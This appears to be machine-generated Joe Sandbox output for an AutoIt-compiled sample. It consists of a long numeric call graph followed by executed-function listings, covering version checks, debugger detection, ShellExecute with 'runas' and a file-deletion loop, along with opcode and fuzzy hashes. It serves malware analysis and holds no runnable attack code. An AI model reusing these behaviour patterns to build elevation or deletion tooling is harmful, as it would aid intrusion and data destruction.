98424->98606 98425 665648 98426 6266e7 68 API calls 98425->98426 98428 66564f 98426->98428 98430 626607 3 API calls 98428->98430 98432 665657 98430->98432 98627 62684a 98432->98627 98433 6266ce 98433->98432 98434 6266da 98433->98434 98436 6266e7 68 API calls 98434->98436 98437 6262fa 98436->98437 98437->98385 98437->98386 98440 66567e 98442 623b62 98441->98442 98443 66415f 98441->98443 98445 64017b 8 API calls 98442->98445 98872 68a215 81 API calls __wsopen_s 98443->98872 98446 623b86 98445->98446 98447 627aab CloseHandle 98446->98447 98450 623bfa 98451 623bec 98451->98450 98454 664179 98451->98454 98873 68d5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98451->98873 98454->98450 98454->98451 98545 6936d4 98544->98545 98546 626874 64 API calls 98545->98546 98547 6936e8 98546->98547 98890 693827 98547->98890 98550 693700 98551 62684a 40 API calls 98595->98399 98599 626656 GetProcAddress 98598->98599 98600 626674 98598->98600 98601 626666 98599->98601 98603 64e95b 98600->98603 98601->98600 98602 62666d FreeLibrary 98601->98602 98602->98600 98635 64e89a 98603->98635 98605 626698 98605->98424 98605->98425 98607 62663b 98606->98607 98608 62661c GetProcAddress 98606->98608 98611 626720 98607->98611 98609 62662c 98608->98609 98609->98607 98610 626634 FreeLibrary 98609->98610 98610->98607 98612 64017b 8 API calls 98611->98612 98613 626735 98612->98613 98614 62423c 8 API calls 98613->98614 98616 626741 __fread_nolock 98614->98616 98615 6656c2 98693 693a92 74 API calls 98615->98693 98616->98615 98620 62677c 98616->98620 98692 693a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98616->98692 98619 62684a 40 API calls 98619->98620 98620->98619 98622 626810 messages 98620->98622 98623 665706 98620->98623 98624 626874 64 API calls 98620->98624 98622->98433 98687 626874 98623->98687 98624->98620 98626 62684a 40 API calls 98626->98622 98628 665760 98627->98628 98629 62685c 98627->98629 98725 64ec34 98629->98725 98632 6932bd 98827 69310d 98632->98827 98634 6932d8 98634->98440 98637 64e8a6 ___BuildCatchObject 98635->98637 98636 64e8b4 98660 64f649 20 API calls __dosmaperr 98636->98660 98637->98636 98640 64e8e4 98637->98640 98639 64e8b9 98661 652b5c 26 API calls pre_c_initialization 98639->98661 98642 64e8f6 98640->98642 98643 64e8e9 98640->98643 98652 6583e1 98642->98652 98662 64f649 20 API calls __dosmaperr 98643->98662 98646 64e8ff 98647 64e905 98646->98647 98648 64e912 98646->98648 98663 64f649 20 API calls __dosmaperr 98647->98663 98664 64e944 LeaveCriticalSection __fread_nolock 98648->98664 98650 64e8c4 __fread_nolock 98650->98605 98653 6583ed ___BuildCatchObject 98652->98653 98665 6532d1 EnterCriticalSection 98653->98665 98655 6583fb 98666 65847b 98655->98666 98659 65842c __fread_nolock 98659->98646 98660->98639 98661->98650 98662->98650 98663->98650 98664->98650 98665->98655 98674 65849e 98666->98674 98667 6584f7 98668 654ff0 pre_c_initialization 20 API calls 98667->98668 98669 658500 98668->98669 98671 652d38 _free 20 API calls 98669->98671 98672 658509 98671->98672 98675 658408 98672->98675 98684 653778 11 API calls 2 library calls 98672->98684 98674->98667 98674->98675 98682 6494fd EnterCriticalSection 98674->98682 98683 649511 LeaveCriticalSection 98674->98683 98679 658437 98675->98679 98676 658528 98685 6494fd EnterCriticalSection 98676->98685 98686 653319 LeaveCriticalSection 98679->98686 98681 65843e 98681->98659 98682->98674 98683->98674 98684->98676 98685->98675 98686->98681 98688 626883 98687->98688 98689 665780 98687->98689 98694 64f053 98688->98694 98692->98615 98693->98620 98697 64ee1a 98694->98697 98696 626891 98696->98626 98700 64ee26 ___BuildCatchObject 98697->98700 98698 64ee32 98722 64f649 20 API calls __dosmaperr 98698->98722 98700->98698 98701 64ee58 98700->98701 98710 6494fd EnterCriticalSection 98701->98710 98702 64ee37 98723 652b5c 26 API calls pre_c_initialization 98702->98723 98705 64ee64 98711 64ef7a 98705->98711 98707 64ee78 98709 64ee42 __fread_nolock 98709->98696 98710->98705 98712 64ef9c 98711->98712 98713 64ef8c 98711->98713 98715 64eea1 28 API calls 98712->98715 98714 64f649 __dosmaperr 20 API calls 98713->98714 98716 64ef91 98714->98716 98717 64efbf 98715->98717 98716->98707 98718 64df7b 62 API calls 98717->98718 98721 64f03e 98717->98721 98721->98707 98722->98702 98723->98709 98728 64ec51 98725->98728 98727 62686d 98727->98632 98729 64ec5d ___BuildCatchObject 98728->98729 98730 64ec70 ___scrt_fastfail 98729->98730 98731 64ec9d 98729->98731 98732 64ec95 __fread_nolock 98729->98732 98755 64f649 20 API calls __dosmaperr 98730->98755 98741 6494fd EnterCriticalSection 98731->98741 98732->98727 98735 64eca7 98742 64ea68 98735->98742 98736 64ec8a 98756 652b5c 26 API calls pre_c_initialization 98736->98756 98741->98735 98745 64ea7a ___scrt_fastfail 98742->98745 98748 64ea97 98742->98748 98743 64ea87 98823 64f649 20 API calls __dosmaperr 98743->98823 98745->98743 98745->98748 98750 64eada __fread_nolock 98745->98750 98746 64ea8c 98824 652b5c 26 API calls pre_c_initialization 98746->98824 98757 64ecdc LeaveCriticalSection __fread_nolock 98748->98757 98749 64ebf6 ___scrt_fastfail 98826 64f649 20 API calls __dosmaperr 98749->98826 98750->98748 98750->98749 98752 64dcc5 __fread_nolock 26 API calls 98750->98752 98758 6590c5 98750->98758 98825 64d2e8 26 API calls 4 library calls 98750->98825 98752->98750 98755->98736 98756->98732 98757->98732 98759 6590d7 98758->98759 98760 6590ef 98758->98760 98762 64f636 __dosmaperr 20 API calls 98759->98762 98761 659459 98760->98761 98767 659134 98760->98767 98764 64f636 __dosmaperr 20 API calls 98761->98764 98763 6590dc 98762->98763 98765 64f649 __dosmaperr 20 API calls 98763->98765 98766 65945e 98764->98766 98768 6590e4 98765->98768 98769 64f649 __dosmaperr 20 API calls 98766->98769 98767->98768 98770 65913f 98767->98770 98776 65916f 98767->98776 98768->98750 98771 65914c 98769->98771 98772 64f636 __dosmaperr 20 API calls 98770->98772 98773 659144 98772->98773 98775 64f649 __dosmaperr 20 API calls 98773->98775 98775->98771 98777 659188 98776->98777 98778 6591ae 98776->98778 98779 6591ca 98776->98779 98777->98778 98812 659195 98777->98812 98780 64f636 __dosmaperr 20 API calls 98778->98780 98782 653b93 _strftime 21 API calls 98779->98782 98781 6591b3 98780->98781 98784 65fc1b __fread_nolock 26 API calls 98812->98784 98823->98746 98824->98748 98825->98750 98826->98746 98830 64e858 98827->98830 98829 69311c 98829->98634 98833 64e7d9 98830->98833 98832 64e875 98832->98829 98834 64e7fc 98833->98834 98835 64e7e8 98833->98835 98840 64e7f8 __alldvrm 98834->98840 98843 6536b2 11 API calls 2 library calls 98834->98843 98841 64f649 20 API calls __dosmaperr 98835->98841 98837 64e7ed 98842 652b5c 26 API calls pre_c_initialization 98837->98842 98840->98832 98841->98837 98842->98840 98843->98840 98872->98451 98895 69383b 98890->98895 98891 6936fc 98891->98550 98891->98551 98892 62684a 40 API calls 98892->98895 98893 6932bd 27 API calls 98893->98895 98894 626874 64 API calls 98894->98895 98895->98891 98895->98892 98895->98893 98895->98894 98992->98327 98993 621033 98998 6268b4 98993->98998 98997 621042 98999 62bf73 8 API calls 98998->98999 99000 626922 98999->99000 99006 62589f 99000->99006 99002 6269bf 99003 621038 99002->99003 99009 626b14 8 API calls __fread_nolock 99002->99009 99005 640413 29 API calls __onexit 99003->99005 99005->98997 99010 6258cb 99006->99010 99009->99002 99011 6258be 99010->99011 99012 6258d8 99010->99012 99011->99002 99012->99011 99013 6258df RegOpenKeyExW 99012->99013 99013->99011 99014 6258f9 RegQueryValueExW 99013->99014 99015 62591a 99014->99015 99016 62592f RegCloseKey 99014->99016 99015->99016 99016->99011 99017 676555 99018 64014b 8 API calls 99017->99018 99019 67655c 99018->99019 99020 64017b 8 API calls 99019->99020 99022 676575 __fread_nolock 99019->99022 99020->99022 99021 64017b 8 API calls 99023 67659a 99021->99023 99022->99021 99024 675650 99033 63e3d5 99024->99033 99026 675666 99028 6756e1 99026->99028 99042 63aa65 9 API calls 99026->99042 99030 6761d7 99028->99030 99044 693fe1 81 API calls __wsopen_s 99028->99044 99031 6756c1 99031->99028 99043 69247e 8 API calls 99031->99043 99034 63e3e3 99033->99034 99035 63e3f6 99033->99035 99045 62b4c8 8 API calls 99034->99045 99037 63e3fb 99035->99037 99038 63e429 99035->99038 99039 64014b 8 API calls 99037->99039 99046 62b4c8 8 API calls 99038->99046 99041 63e3ed 99039->99041 99041->99026 99042->99031 99043->99028 99044->99030 99045->99041 99046->99041 99047 6236f5 99050 62370f 99047->99050 99051 623726 99050->99051 99052 62378a 99051->99052 99053 62372b 99051->99053 99090 623788 99051->99090 99057 663df4 99052->99057 99058 623790 99052->99058 99054 623804 PostQuitMessage 99053->99054 99055 623738 99053->99055 99084 623709 99054->99084 99061 623743 99055->99061 99062 663e61 99055->99062 99056 62376f DefWindowProcW 99056->99084 99105 622f92 10 API calls 99057->99105 99059 623797 99058->99059 99060 6237bc SetTimer RegisterWindowMessageW 99058->99060 99064 6237a0 KillTimer 99059->99064 99065 663d95 99059->99065 99066 6237e5 CreatePopupMenu 99060->99066 99060->99084 99067 62380e 99061->99067 99068 62374d 99061->99068 99108 68c8f7 65 API calls ___scrt_fastfail 99062->99108 99073 623907 Shell_NotifyIconW 99064->99073 99071 663dd0 MoveWindow 99065->99071 99072 663d9a 99065->99072 99066->99084 99095 63fcad 99067->99095 99074 663e46 99068->99074 99075 623758 99068->99075 99070 663e15 99106 63f23c 40 API calls 99070->99106 99071->99084 99079 663da0 99072->99079 99080 663dbf SetFocus 99072->99080 99081 6237b3 99073->99081 99074->99056 99107 681423 8 API calls 99074->99107 99082 6237f2 99075->99082 99083 623763 99075->99083 99076 663e73 99076->99056 99076->99084 99079->99083 99085 663da9 99079->99085 99080->99084 99102 6259ff DeleteObject DestroyWindow 99081->99102 99103 62381f 75 API calls ___scrt_fastfail 99082->99103 99083->99056 99092 623907 Shell_NotifyIconW 99083->99092 99104 622f92 10 API calls 99085->99104 99090->99056 99091 623802 99091->99084 99093 663e3a 99092->99093 99094 62396b 60 API calls 99093->99094 99094->99090 99096 63fcc5 ___scrt_fastfail 99095->99096 99097 63fd4b 99095->99097 99098 6261a9 55 API calls 99096->99098 99097->99084 99100 63fcec 99098->99100 99099 63fd34 KillTimer SetTimer 99099->99097 99100->99099 99101 67fe2b Shell_NotifyIconW 99100->99101 99101->99099 99102->99084 99103->99091 99104->99084 99105->99070 99106->99083 99107->99090 99108->99076 99109 62105b 99114 6252a7 99109->99114 99111 62106a 99145 640413 29 API calls __onexit 99111->99145 99113 621074 99115 6252b7 __wsopen_s 99114->99115 99116 62bf73 8 API calls 99115->99116 99117 62536d 99116->99117 99118 625594 10 API calls 99117->99118 99119 625376 99118->99119 99146 625238 99119->99146 99122 626b7c 8 API calls 99123 62538f 99122->99123 99124 626a7c 8 API calls 99123->99124 99125 62539e 99124->99125 99126 62bf73 8 API calls 99125->99126 99127 6253a7 99126->99127 99128 62bd57 8 API calls 99127->99128 99129 6253b0 RegOpenKeyExW 99128->99129 99130 664be6 RegQueryValueExW 99129->99130 99135 6253d2 99129->99135 99131 664c03 99130->99131 99132 664c7c RegCloseKey 99130->99132 99133 64017b 8 API calls 99131->99133 99132->99135 99144 664c8e _wcslen 99132->99144 99134 664c1c 99133->99134 99136 62423c 8 API calls 99134->99136 99135->99111 99137 664c27 RegQueryValueExW 99136->99137 99138 664c44 99137->99138 99141 664c5e messages 99137->99141 99139 628577 8 API calls 99138->99139 99139->99141 99140 62655e 8 API calls 99140->99144 99141->99132 99142 62b329 8 API calls 99142->99144 99143 626a7c 8 API calls 99143->99144 99144->99135 99144->99140 99144->99142 99144->99143 99145->99113 99147 6622d0 __wsopen_s 99146->99147 99148 625245 GetFullPathNameW 99147->99148 99149 625267 99148->99149 99150 628577 8 API calls 99149->99150 99151 625285 99150->99151 99151->99122 99152 621098 99157 625fc8 99152->99157 99156 6210a7 99158 62bf73 8 API calls 99157->99158 99159 625fdf GetVersionExW 99158->99159 99160 628577 8 API calls 99159->99160 99161 62602c 99160->99161 99162 62adf4 8 API calls 99161->99162 99176 626062 99161->99176 99163 626056 99162->99163 99165 6255dc 8 API calls 99163->99165 99164 62611c GetCurrentProcess IsWow64Process 99166 626138 99164->99166 99165->99176 99167 626150 LoadLibraryA 99166->99167 99168 665269 GetSystemInfo 99166->99168 99169 626161 GetProcAddress 99167->99169 99170 62619d GetSystemInfo 99167->99170 99169->99170 99171 626171 GetNativeSystemInfo 99169->99171 99172 626177 99170->99172 99171->99172 99174 62109d 99172->99174 99175 62617b FreeLibrary 99172->99175 99173 665224 99177 640413 29 API calls __onexit 99174->99177 99175->99174 99176->99164 99176->99173 99177->99156 99178 630ebf 99179 630ed3 99178->99179 99184 631425 99178->99184 99180 630ee5 99179->99180 99181 64014b 8 API calls 99179->99181 99182 67562c 99180->99182 99185 630f3e 99180->99185 99211 62b4c8 8 API calls 99180->99211 99181->99180 99212 691b14 8 API calls 99182->99212 99184->99180 99188 62bed9 8 API calls 99184->99188 99186 632b20 207 API calls 99185->99186 99204 63049d messages 99185->99204 99210 630376 messages 99186->99210 99188->99180 99189 67632b 99216 693fe1 81 API calls __wsopen_s 99189->99216 99190 631e50 40 API calls 99190->99210 99191 631695 99197 62bed9 8 API calls 99191->99197 99191->99204 99192 64014b 8 API calls 99192->99210 99194 62bed9 8 API calls 99194->99210 99195 675cdb 99201 62bed9 8 API calls 99195->99201 99195->99204 99196 67625a 99215 693fe1 81 API calls __wsopen_s 99196->99215 99197->99204 99200 631990 207 API calls 99200->99210 99201->99204 99202 6405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99202->99210 99203 62bf73 8 API calls 99203->99210 99205 640413 29 API calls pre_c_initialization 99205->99210 99206 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99206->99210 99207 676115 99213 693fe1 81 API calls __wsopen_s 99207->99213 99208 630aae messages 99214 693fe1 81 API calls __wsopen_s 99208->99214 99210->99189 99210->99190 99210->99191 99210->99192 99210->99194 99210->99195 99210->99196 99210->99200 99210->99202 99210->99203 99210->99204 99210->99205 99210->99206 99210->99207 99210->99208 99211->99180 99212->99204 99213->99208 99214->99204 99215->99204 99216->99204 99217 62f4dc 99218 62cab0 207 API calls 99217->99218 99219 62f4ea 99218->99219 99220 65947a 99221 659487 99220->99221 99226 65949f 99220->99226 99270 64f649 20 API calls __dosmaperr 99221->99270 99223 65948c 99271 652b5c 26 API calls pre_c_initialization 99223->99271 99225 659497 99226->99225 99227 6594fa 99226->99227 99272 660144 21 API calls 2 library calls 99226->99272 99229 64dcc5 __fread_nolock 26 API calls 99227->99229 99230 659512 99229->99230 99240 658fb2 99230->99240 99232 659519 99232->99225 99233 64dcc5 __fread_nolock 26 API calls 99232->99233 99234 659545 99233->99234 99234->99225 99235 64dcc5 __fread_nolock 26 API calls 99234->99235 99236 659553 99235->99236 99236->99225 99237 64dcc5 __fread_nolock 26 API calls 99236->99237 99238 659563 99237->99238 99239 64dcc5 __fread_nolock 26 API calls 99238->99239 99239->99225 99241 658fbe ___BuildCatchObject 99240->99241 99242 658fc6 99241->99242 99243 658fde 99241->99243 99274 64f636 20 API calls __dosmaperr 99242->99274 99245 6590a4 99243->99245 99250 659017 99243->99250 99281 64f636 20 API calls __dosmaperr 99245->99281 99246 658fcb 99275 64f649 20 API calls __dosmaperr 99246->99275 99248 6590a9 99282 64f649 20 API calls __dosmaperr 99248->99282 99252 659026 99250->99252 99253 65903b 99250->99253 99276 64f636 20 API calls __dosmaperr 99252->99276 99273 6554ba EnterCriticalSection 99253->99273 99255 659033 99283 652b5c 26 API calls pre_c_initialization 99255->99283 99257 659041 99259 659072 99257->99259 99260 65905d 99257->99260 99258 65902b 99277 64f649 20 API calls __dosmaperr 99258->99277 99265 6590c5 __fread_nolock 38 API calls 99259->99265 99278 64f649 20 API calls __dosmaperr 99260->99278 99264 658fd3 __fread_nolock 99264->99232 99267 65906d 99265->99267 99266 659062 99279 64f636 20 API calls __dosmaperr 99266->99279 99280 65909c LeaveCriticalSection __wsopen_s 99267->99280 99270->99223 99271->99225 99272->99227 99273->99257 99274->99246 99275->99264 99276->99258 99277->99255 99278->99266 99279->99267 99280->99264 99281->99248 99282->99255 99283->99264 99284 63235c 99289 632365 __fread_nolock 99284->99289 99285 628ec0 52 API calls 99285->99289 99286 6774e3 99296 6813c8 8 API calls __fread_nolock 99286->99296 99288 6774ef 99293 62bed9 8 API calls 99288->99293 99294 631ff7 __fread_nolock 99288->99294 99289->99285 99289->99286 99290 6323b6 99289->99290 99292 64014b 8 API calls 99289->99292 99289->99294 99295 64017b 8 API calls 99289->99295 99291 627d74 8 API calls 99290->99291 99291->99294 99292->99289 99293->99294 99295->99289 99296->99288 99297 62dd3d 99298 62dd63 99297->99298 99299 6719c2 99297->99299 99300 62dead 99298->99300 99303 64014b 8 API calls 99298->99303 99302 671a82 99299->99302 99307 671a26 99299->99307 99310 671a46 99299->99310 99304 64017b 8 API calls 99300->99304 99357 693fe1 81 API calls __wsopen_s 99302->99357 99309 62dd8d 99303->99309 99316 62dee4 __fread_nolock 99304->99316 99305 671a7d 99355 63e6e8 207 API calls 99307->99355 99311 64014b 8 API calls 99309->99311 99309->99316 99310->99305 99356 693fe1 81 API calls __wsopen_s 99310->99356 99312 62dddb 99311->99312 99312->99307 99314 62de16 99312->99314 99313 64017b 8 API calls 99313->99316 99315 630340 207 API calls 99314->99315 99317 62de29 99315->99317 99316->99310 99316->99313 99317->99305 99317->99316 99318 671aa5 99317->99318 99319 62de77 99317->99319 99321 62d526 99317->99321 99358 693fe1 81 API calls __wsopen_s 99318->99358 99319->99300 99319->99321 99322 64014b 8 API calls 99321->99322 99323 62d589 99322->99323 99339 62c32d 99323->99339 99326 64014b 8 API calls 99327 62d66e messages 99326->99327 99329 62bed9 8 API calls 99327->99329 99332 671f79 99327->99332 99334 671f94 99327->99334 99336 62d911 messages 99327->99336 99346 62c3ab 99327->99346 99359 62b4c8 8 API calls 99327->99359 99328 62c3ab 8 API calls 99337 62d9ac messages 99328->99337 99329->99327 99360 6856ae 8 API calls messages 99332->99360 99336->99328 99336->99337 99338 62d9c3 99337->99338 99354 63e30a 8 API calls messages 99337->99354 99345 62c33d 99339->99345 99340 62c345 99340->99326 99341 64014b 8 API calls 99341->99345 99342 62bf73 8 API calls 99342->99345 99343 62bed9 8 API calls 99343->99345 99344 62c32d 8 API calls 99344->99345 99345->99340 99345->99341 99345->99342 99345->99343 99345->99344 99347 62c3b9 99346->99347 99353 62c3e1 messages 99346->99353 99348 62c3c7 99347->99348 99349 62c3ab 8 API calls 99347->99349 99350 62c3cd 99348->99350 99351 62c3ab 8 API calls 99348->99351 99349->99348 99350->99353 99361 62c7e0 8 API calls messages 99350->99361 99351->99350 99353->99327 99354->99337 99355->99310 99356->99305 99357->99305 99358->99305 99359->99327 99360->99334 99361->99353

                                                                  Executed Functions

                                                                  Function 00625FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 224 625fc8-626037 call 62bf73 GetVersionExW call 628577 229 66507d-665090 224->229 230 62603d 224->230 231 665091-665095 229->231 232 62603f-626041 230->232 235 665097 231->235 236 665098-6650a4 231->236 233 626047-6260a6 call 62adf4 call 6255dc 232->233 234 6650bc 232->234 248 665224-66522b 233->248 249 6260ac-6260ae 233->249 239 6650c3-6650cf 234->239 235->236 236->231 238 6650a6-6650a8 236->238 238->232 241 6650ae-6650b5 238->241 242 62611c-626136 GetCurrentProcess IsWow64Process 239->242 241->229 244 6650b7 241->244 246 626195-62619b 242->246 247 626138 242->247 244->234 250 62613e-62614a 246->250 247->250 253 66522d 248->253 254 66524b-66524e 248->254 251 665125-665138 249->251 252 6260b4-6260b7 249->252 255 626150-62615f LoadLibraryA 250->255 256 665269-66526d GetSystemInfo 250->256 257 665161-665163 251->257 258 66513a-665143 251->258 252->242 259 6260b9-6260f5 252->259 260 665233 253->260 261 665250-66525f 254->261 262 665239-665241 254->262 263 626161-62616f GetProcAddress 255->263 264 62619d-6261a7 GetSystemInfo 255->264 270 665165-66517a 257->270 271 665198-66519b 257->271 267 665145-66514b 258->267 268 665150-66515c 258->268 259->242 269 6260f7-6260fa 259->269 260->262 261->260 272 665261-665267 261->272 262->254 263->264 265 626171-626175 GetNativeSystemInfo 263->265 266 626177-626179 264->266 265->266 273 626182-626194 266->273 274 62617b-62617c FreeLibrary 266->274 267->242 268->242 275 6650d4-6650e4 269->275 276 626100-62610a 269->276 277 665187-665193 270->277 278 66517c-665182 270->278 279 6651d6-6651d9 271->279 280 66519d-6651b8 271->280 272->262 274->273 283 6650e6-6650f2 275->283 284 6650f7-665101 275->284 276->239 286 626110-626116 276->286 277->242 278->242 279->242 285 6651df-665206 279->285 281 6651c5-6651d1 280->281 282 6651ba-6651c0 280->282 281->242 282->242 283->242 287 665114-665120 284->287 288 665103-66510f 284->288 289 665213-66521f 285->289 290 665208-66520e 285->290 286->242 287->242 288->242 289->242 290->242
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 00625FF7
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • GetCurrentProcess.KERNEL32(?,006BDC2C,00000000,?,?), ref: 00626123
                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 0062612A
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00626155
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00626167
                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00626175
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0062617C
                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 006261A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                  • API String ID: 3290436268-3101561225
                                                                  • Opcode ID: f443f92faed25aff5a0085cf00af0472d5e80d5044cd7d0ca0299847456dd3da
                                                                  • Instruction ID: 020178ad5d0fcb7f0eb424d4855959f299c857d1c38c6b51a0ad5ed50cb7eb61
                                                                  • Opcode Fuzzy Hash: f443f92faed25aff5a0085cf00af0472d5e80d5044cd7d0ca0299847456dd3da
                                                                  • Instruction Fuzzy Hash: 87A1A2B384AAE6CFCB11CB6CBC651F57F976B36700B087899E48197222D22D5549CF31
                                                                  Function 0062338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00623368,?), ref: 006233BB
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00623368,?), ref: 006233CE
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,006F2418,006F2400,?,?,?,?,?,?,00623368,?), ref: 0062343A
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                    • Part of subcall function 0062425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623462,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006242A0
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 006234BB
                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00663CB0
                                                                  • SetCurrentDirectoryW.KERNEL32(?,006F2418,?,?,?,?,?,?,?,00623368,?), ref: 00663CF1
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006E31F4,006F2418,?,?,?,?,?,?,?,00623368), ref: 00663D7A
                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00663D81
                                                                    • Part of subcall function 006234D3: GetSysColorBrush.USER32(0000000F), ref: 006234DE
                                                                    • Part of subcall function 006234D3: LoadCursorW.USER32(00000000,00007F00), ref: 006234ED
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(00000063), ref: 00623503
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(000000A4), ref: 00623515
                                                                    • Part of subcall function 006234D3: LoadIconW.USER32(000000A2), ref: 00623527
                                                                    • Part of subcall function 006234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0062353F
                                                                    • Part of subcall function 006234D3: RegisterClassExW.USER32(?), ref: 00623590
                                                                    • Part of subcall function 006235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006235E1
                                                                    • Part of subcall function 006235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623602
                                                                    • Part of subcall function 006235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 00623616
                                                                    • Part of subcall function 006235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 0062361F
                                                                    • Part of subcall function 0062396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00623A3C
                                                                  Strings
                                                                  • runas, xrefs: 00663D75
                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00663CAA
                                                                  • AutoIt, xrefs: 00663CA5
                                                                  • 0$o, xrefs: 00623495
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                  • String ID: 0$o$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                  • API String ID: 683915450-109674955
                                                                  • Opcode ID: 011d21d11805b255b4091b1acc71ba8e94459695ce8717d9631071d159d08805
                                                                  • Instruction ID: dc1c57f74672b76cd47da28b40fa26d2e0fdc85d98bb8f9c6656f0458d786c2b
                                                                  • Opcode Fuzzy Hash: 011d21d11805b255b4091b1acc71ba8e94459695ce8717d9631071d159d08805
                                                                  • Instruction Fuzzy Hash: C9512A71108776AAC701FF60EC11DBE7BEB9F91740F00252CF581563A2DB648A8ACF56
                                                                  Function 0068DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1741 68dc54-68dc9b call 62bf73 * 3 call 625851 call 68eab0 1752 68dcab-68dcdc call 62568e FindFirstFileW 1741->1752 1753 68dc9d-68dca6 call 626b7c 1741->1753 1757 68dd4b-68dd52 FindClose 1752->1757 1758 68dcde-68dce0 1752->1758 1753->1752 1759 68dd56-68dd78 call 62bd98 * 3 1757->1759 1758->1757 1760 68dce2-68dce7 1758->1760 1762 68dce9-68dd24 call 62bed9 call 627bb5 call 626b7c DeleteFileW 1760->1762 1763 68dd26-68dd38 FindNextFileW 1760->1763 1762->1763 1776 68dd42-68dd49 FindClose 1762->1776 1763->1758 1764 68dd3a-68dd40 1763->1764 1764->1758 1776->1759
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 0068EAB0: GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0068DCCB
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DD1B
                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0068DD2C
                                                                  • FindClose.KERNEL32(00000000), ref: 0068DD43
